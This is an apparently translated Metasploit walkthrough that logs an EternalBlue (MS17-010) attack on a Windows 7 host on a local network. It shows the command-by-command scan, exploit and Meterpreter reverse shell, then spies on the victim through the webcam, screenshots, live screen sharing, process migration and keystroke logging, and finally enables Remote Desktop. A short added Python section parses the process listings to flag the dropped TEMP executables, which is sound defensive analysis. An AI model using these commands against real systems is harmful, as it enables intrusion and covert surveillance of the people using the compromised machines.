Port scan
┌──(root💀kali)-[~/桌面]
└─# nmap -sS -p 445 -oG - 192.168.0.0/24 | grep open
Host: 192.168.0.18 (localhost) Ports: 445/open/tcp//microsoft-ds///
Host: 192.168.0.26 (localhost) Ports: 445/open/tcp//microsoft-ds///
Host: 192.168.0.44 (localhost) Ports: 445/open/tcp//microsoft-ds///
Check whether the msf database is running
┌──(root💀kali)-[~/桌面]
└─# msfdb status
● postgresql.service - PostgreSQL RDBMS
Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
Active: active (exited) since Fri 2021-05-07 19:19:46 CST; 3 months 6 days ago
Process: 2114 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
Main PID: 2114 (code=exited, status=0/SUCCESS)
CPU: 2ms
5月 07 19:19:46 kali systemd[1]: Starting PostgreSQL RDBMS...
5月 07 19:19:46 kali systemd[1]: Finished PostgreSQL RDBMS.
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
postgres 2096 postgres 5u IPv6 31630 0t0 TCP localhost:5432 (LISTEN)
postgres 2096 postgres 6u IPv4 31631 0t0 TCP localhost:5432 (LISTEN)
UID PID PPID C STIME TTY STAT TIME CMD
postgres 2096 1 0 12:43 ? Ss 0:01 /usr/lib/postgresql/13/bin/postgres -D /var/lib/postgresql/13/main -c config_file=/etc/postgresql/13/main/postgresql.conf
[+] Detected configuration file (/usr/share/metasploit-framework/config/database.yml)
Start msf
┌──(root💀kali)-[~/桌面]
└─# msfconsole
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
=[ metasploit v6.0.37-dev ]
+ -- --=[ 2111 exploits - 1136 auxiliary - 357 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services
msf6 >
Find the EternalBlue modules
msf6 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
2 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
3 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
4 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/smb/smb_ms17_010
Check whether the host is vulnerable to EternalBlue
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.0.44
rhost => 192.168.0.44
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.0.44:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.44:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
Exploit the vulnerability with the exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.44
rhost => 192.168.0.44
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.0.130:4444
[*] 192.168.0.44:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.0.44:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.44:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.44:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.44:445 - The target is vulnerable.
[*] 192.168.0.44:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.44:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.44:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.0.44:445 - Connecting to target for exploitation.
[+] 192.168.0.44:445 - Connection established for exploitation.
[+] 192.168.0.44:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.44:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.0.44:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.0.44:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.0.44:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.0.44:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.44:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.44:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.44:445 - Starting non-paged pool grooming
[+] 192.168.0.44:445 - Sending SMBv2 buffers
[+] 192.168.0.44:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.44:445 - Sending final SMBv2 buffers.
[*] 192.168.0.44:445 - Sending last fragment of exploit packet!
[*] 192.168.0.44:445 - Receiving response from exploit packet
[+] 192.168.0.44:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.44:445 - Sending egg to corrupted connection.
[*] 192.168.0.44:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.0.44
[*] Meterpreter session 1 opened (192.168.0.130:4444 -> 192.168.0.44:49169) at 2021-08-13 20:12:50 +0800
[+] 192.168.0.44:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.44:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.44:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
Using the webcam device
## List the webcams
meterpreter > webcam_list
1: Integrated Camera
meterpreter >
## Open the webcam (live stream)
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: /root/桌面/wdLIGCsG.html
[*] Streaming...
## Take a photo with the webcam
meterpreter >
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/桌面/OBFcneAz.jpeg
meterpreter >
Capture a screenshot
meterpreter > screensh
screenshare screenshot
meterpreter > screenshot
Screenshot saved to: /root/桌面/AntqirEf.jpeg
meterpreter >
Watch the desktop in real time
meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /root/桌面/ijMyjxef.html
[*] Streaming...
^C[GFX1-]: Receive IPC close with reason=AbnormalShutdown
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
[-] Error running command screenshare: Interrupt
Capture keystrokes
## Look up the current process IDs
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
168 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
300 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
468 372 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
524 372 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
532 516 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
580 972 dwm.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\Dwm.exe
584 524 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
592 524 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
600 524 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
700 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
760 584 ibmpmsvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\ibmpmsvc.exe
792 584 LPlatSvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\LPlatSvc.exe
800 584 PresentationFontCache.exe x64 0 NT AUTHORITY\LOCAL SERVICE
872 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
920 1144 igfxEM.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxEM.exe
936 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
972 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1000 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1028 1120 RAVBg64.exe x64 1 NT AUTHORITY\SYSTEM C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
1060 584 igfxCUIService.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\igfxCUIService.exe
1112 1144 igfxHK.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxHK.exe
1120 584 RtkAudioService64.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
1176 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1256 516 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
1368 1928 explorer.exe x64 1 yuanan-PC\yuanan C:\Windows\Explorer.EXE
1416 1144 igfxTray.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxTray.exe
1440 584 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1488 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1552 1440 PDMQlQpOYKl.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\PDMQlQpOYKl.exe
1720 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1904 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1936 1000 taskeng.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\taskeng.exe
2236 1440 nDjWCo.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\nDjWCo.exe
2284 584 wmpnetwk.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2288 792 LPlatSvc.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\LPlatSvc.exe
2296 584 taskhost.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\taskhost.exe
2532 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2568 584 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2608 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2672 584 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
3100 1936 RAVBg64.exe x64 1 yuanan-PC\yuanan C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
3164 3112 RAVCpl64.exe x64 1 yuanan-PC\yuanan C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
3500 1440 HPGNJDtrnf.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\HPGNJDtrnf.exe
## Check the process list again after Notepad has been opened
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
168 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
300 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
468 372 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
524 372 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
532 516 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
580 972 dwm.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\Dwm.exe
584 524 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
592 524 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
600 524 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
700 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
760 584 ibmpmsvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\ibmpmsvc.exe
792 584 LPlatSvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\LPlatSvc.exe
800 584 PresentationFontCache.exe x64 0 NT AUTHORITY\LOCAL SERVICE
872 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
920 1144 igfxEM.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxEM.exe
936 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
972 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1000 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1028 1120 RAVBg64.exe x64 1 NT AUTHORITY\SYSTEM C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
1060 584 igfxCUIService.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\igfxCUIService.exe
1112 1144 igfxHK.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxHK.exe
1120 584 RtkAudioService64.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
1176 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1256 516 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
1368 1928 explorer.exe x64 1 yuanan-PC\yuanan C:\Windows\Explorer.EXE
1416 1144 igfxTray.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\igfxTray.exe
1440 584 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1488 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1552 1440 PDMQlQpOYKl.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\PDMQlQpOYKl.exe
1720 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1904 584 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1936 1000 taskeng.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\taskeng.exe
2236 1440 nDjWCo.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\nDjWCo.exe
2256 1368 notepad.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\NOTEPAD.EXE
2284 584 wmpnetwk.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2288 792 LPlatSvc.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\LPlatSvc.exe
2296 584 taskhost.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\taskhost.exe
2400 2672 SearchFilterHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchFilterHost.exe
2532 584 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2568 584 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2608 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2672 584 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
3100 1936 RAVBg64.exe x64 1 yuanan-PC\yuanan C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
3164 3112 RAVCpl64.exe x64 1 yuanan-PC\yuanan C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
3500 1440 HPGNJDtrnf.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\HPGNJDtrnf.exe
4052 2672 SearchProtocolHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchProtocolHost.exe
## Migrate into Notepad's process ID
meterpreter > migrate 2256
[*] Migrating from 1440 to 2256...
[*] Migration completed successfully.
meterpreter >
meterpreter > key
keyboard_send keyevent keyscan_dump keyscan_start keyscan_stop
## Start the keystroke capture
meterpreter > keyscan_start
Starting the keystroke sniffer ...
## Dump the captured keystrokes
meterpreter > keyscan_dump
Dumping captured keystrokes...
jhgjhgjhghjgjhllll<CR>
<CR>
<CR>
<CR>
1dsds<CR>
## Stop the keystroke capture
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter >
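A defender's reading of the two process listings above, as an added example that is not part of the original page: a Python parser for Meterpreter-style `ps` rows that flags what a responder would look for here, the x86 SYSTEM images dropped into C:\Windows\TEMP whose parent is spoolsv.exe (PID 1440, the process the session migrated out of), and the PIDs that appeared between the two snapshots. The sample rows are a constructed subset of the page's own listings; the field heuristics (arch token, drive-letter or root-relative path) are assumptions about the whitespace-collapsed format shown on this page.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Constructed subset of the page's first "ps" listing, whitespace collapsed
# (PID PPID Name Arch Session User Path).
PS_BEFORE = r"""
0 0 [System Process]
4 0 System x64 0
300 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
584 524 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
700 584 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1028 1120 RAVBg64.exe x64 1 NT AUTHORITY\SYSTEM C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
1368 1928 explorer.exe x64 1 yuanan-PC\yuanan C:\Windows\Explorer.EXE
1440 584 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1552 1440 PDMQlQpOYKl.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\PDMQlQpOYKl.exe
2236 1440 nDjWCo.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\nDjWCo.exe
3500 1440 HPGNJDtrnf.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\HPGNJDtrnf.exe
"""
# Second snapshot: the same rows plus the processes that appeared after Notepad was opened.
PS_AFTER = PS_BEFORE + r"""
2256 1368 notepad.exe x64 1 yuanan-PC\yuanan C:\Windows\system32\NOTEPAD.EXE
2400 2672 SearchFilterHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchFilterHost.exe
"""

ARCHES = {"x86", "x64"}
PATH_START = re.compile(r"^(?:[A-Za-z]:\\|\\)")  # C:\... or \SystemRoot\...

@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    arch: Optional[str] = None
    session: Optional[int] = None
    user: str = ""
    path: str = ""

def parse_ps(text: str) -> Dict[int, Proc]:
    """Parse whitespace-collapsed ps rows into {pid: Proc}; header/ruler lines are skipped."""
    procs: Dict[int, Proc] = {}
    for line in text.splitlines():
        toks = line.split()
        if len(toks) < 3 or not toks[0].isdigit() or not toks[1].isdigit():
            continue
        pid, ppid, rest = int(toks[0]), int(toks[1]), toks[2:]
        # The name runs up to the arch token; "[System Process]" has no arch at all.
        aidx = next((i for i, t in enumerate(rest) if t in ARCHES), None)
        if aidx is None:
            procs[pid] = Proc(pid, ppid, " ".join(rest))
            continue
        name, arch, rest = " ".join(rest[:aidx]), rest[aidx], rest[aidx + 1:]
        session = None
        if rest and rest[0].isdigit():
            session, rest = int(rest[0]), rest[1:]
        # Path is the first token that looks like a Windows path; user is everything before it.
        pidx = next((i for i, t in enumerate(rest) if PATH_START.match(t)), len(rest))
        procs[pid] = Proc(pid, ppid, name, arch, session,
                          " ".join(rest[:pidx]), " ".join(rest[pidx:]))
    return procs

def suspicious(procs: Dict[int, Proc]) -> Dict[int, List[str]]:
    """Return {pid: [reasons]} for rows matching the post-exploitation pattern on this page."""
    host_is_x64 = any(p.arch == "x64" for p in procs.values())
    out: Dict[int, List[str]] = {}
    for p in procs.values():
        reasons: List[str] = []
        if "\\windows\\temp\\" in p.path.lower():
            reasons.append("image runs from C:\\Windows\\TEMP")
        parent = procs.get(p.ppid)
        if parent and parent.name.lower() == "spoolsv.exe":
            reasons.append("child of spoolsv.exe, which rarely spawns executables")
        if host_is_x64 and p.arch == "x86" and p.user.upper() == "NT AUTHORITY\\SYSTEM":
            reasons.append("32-bit image running as SYSTEM on a 64-bit host")
        if reasons:
            out[p.pid] = reasons
    return out

def new_processes(before: Dict[int, Proc], after: Dict[int, Proc]) -> Set[int]:
    """PIDs present in the second snapshot only (here notepad.exe, the later migration target)."""
    return set(after) - set(before)

if __name__ == "__main__":
    before, after = parse_ps(PS_BEFORE), parse_ps(PS_AFTER)
    for pid, why in sorted(suspicious(before).items()):
        print(f"PID {pid:5} {before[pid].name:18} {'; '.join(why)}")
    print("new since first snapshot:", sorted(new_processes(before, after)))
```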
Enable Remote Desktop
run post/windows/manage/enable_rdp